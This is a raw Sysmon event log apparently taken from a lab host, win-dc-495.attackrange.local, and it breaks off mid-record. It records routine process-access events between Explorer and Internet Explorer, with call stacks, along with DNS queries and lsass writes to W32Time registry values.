dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:59.054{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:59.022{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:59.022{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:59.022{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 22542200x800000000000000013527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.446{59A5CD1D-940F-6005-0C05-00000000A301}6476dofirefox9003-C:\Program Files\Internet Explorer\iexplore.exe 13241300x800000000000000013526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000013525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001709e3) 13241300x800000000000000013524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed99-0xb056d8e5) 13241300x800000000000000013523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0x121b40e5) 13241300x800000000000000013522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edaa-0x73dfa8e5) 13241300x800000000000000013521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000013520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001709e3) 13241300x800000000000000013519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed99-0xb056d8e5) 13241300x800000000000000013518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0x121b40e5) 13241300x800000000000000013517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edaa-0x73dfa8e5) 22542200x800000000000000013528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:00.339{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.21.107.13.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000013571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.507{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.491{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.491{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.491{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 10341000x800000000000000013567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 